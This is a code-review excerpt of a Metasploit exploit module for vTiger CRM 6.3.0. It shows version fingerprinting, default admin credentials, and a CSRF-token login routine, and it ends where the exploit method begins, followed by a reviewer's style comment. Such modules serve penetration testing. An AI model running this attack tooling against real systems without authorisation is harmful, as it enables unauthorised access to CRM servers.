modules/exploits/multi/http/vtiger-logo-upload-exec.rb

```diff
@@ -0,0 +1,225 @@
+        'Targets' =>
+        [
+          ['vTiger CRM v6.3.0', { }],
+        ],
+        'DefaultTarget'  => 0,
+        'DisclosureDate' => 'Sep 28 2015'))
+
+        register_options(
+        [
+          OptString.new('TARGETURI', [ true, "Base vTiger CRM directory path", '/']),
+          OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
+          OptString.new('PASSWORD', [ true, "Password to authenticate with", 'password'])
+        ])
+
+      # Some PHP version uses php_short_code=ON
+        register_advanced_options(
+        [
+         OptBool.new('PHPSHORTTAG', [ false, 'Set a short_open_tag option', false ])
+        ], self.class)
+    end
+
+  def check
+    res = nil
+    begin
+      res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'index.php') })
+    rescue
+      vprint_error("Unable to access the index.php file")
+      return CheckCode::Unknown
+    end
+
+    if res and res.code != 200
+      vprint_error("Error accessing the index.php file")
+      return CheckCode::Unknown
+    end
+
+    if res.body =~ /<small> Powered by vtiger CRM (.*.0)<\/small>/i
+      vprint_status("vTiger CRM version: " + $1)
+      case $1
+      when '6.3.0'
+	      return Exploit::CheckCode::Vulnerable
+      else
+        return CheckCode::Detected
+      end
+    end
+
+    return CheckCode::Safe
+  end
+
+
+  # Login Function.
+  def login
+      # Dummy Request for grabbing CSRF token and PHPSESSION ID
+      res = send_request_cgi({ 
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'vhost' => "#{rhost}:#{rport}",
+      })
+      
+      # Grabbing CSRF token from body
+      /var csrfMagicToken = "(?<csrf>sid:[a-z0-9,;:]+)";/ =~ res.body
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?     
+      vprint_good("CSRF Token for login: #{csrf}")
+
+      # Get Login now.
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'vars_get' => {
+          'module' => 'Users',
+          'action' => 'Login',
+        },
+        'vars_post' => {
+	        '__vtrftk' => csrf,
+        	'username' => datastore['USERNAME'],
+        	'password' => datastore['PASSWORD']
+      	},
+      })
+
+    unless res
+      fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request")
+    end
+
+    if res.code == 302 && res.headers['Location'].include?("index.php?module=Users&parent=Settings&view=SystemSetup")
+      vprint_good("Authentication successful: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+      store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
+      return res.get_cookies
+    else
+      fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]")
+      return nil
+    end  
+  end
+
+  def exploit
+    begin
```

Comment:
Rather than wrap the entire method contents in a `begin`, you can use the rescue-from-method approach.